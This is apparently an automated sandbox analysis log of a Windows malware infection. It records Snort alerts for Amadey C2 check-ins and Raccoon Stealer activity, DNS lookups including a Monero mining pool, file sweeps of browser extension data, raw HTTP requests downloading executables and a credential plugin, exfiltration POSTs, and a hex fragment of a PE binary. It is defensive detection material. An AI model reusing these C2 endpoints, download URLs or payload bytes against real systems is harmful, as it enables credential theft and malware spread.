Source: Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                          Networking:

                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49887 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49902 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49905 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49916 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49950 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\explorer.exe | Domain query: pool.supportxmr.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.212.0 25
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----aea6c0e437f81733b7ee77dd06981aea | Host: 185.215.113.35 | Content-Length: 83351 | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /3.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: GET /advert.msi HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /File.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: GET /123.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /442.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /512412.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /443.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /RM.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 31 33 34 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=813435&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----b06fcd66668bd01f7f6369d95074ea8d | Host: 185.215.113.35 | Content-Length: 96982 | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:12 GMT | Content-Type: application/x-msdos-program | Content-Length: 301056 | Connection: close | Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT | ETag: "49800-5d5392be00934" | Accept-Ranges: bytes
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:15 GMT | Content-Type: application/x-msdos-program | Content-Length: 294400 | Connection: close | Last-Modified: Thu, 13 Jan 2022 23:15:01 GMT | ETag: "47e00-5d57edb175f56" | Accept-Ranges: bytes
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:20 GMT | Content-Type: application/x-msdos-program | Content-Length: 327680 | Connection: close | Last-Modified: Thu, 13 Jan 2022 23:15:02 GMT | ETag: "50000-5d57edb2597f5" | Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:51 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
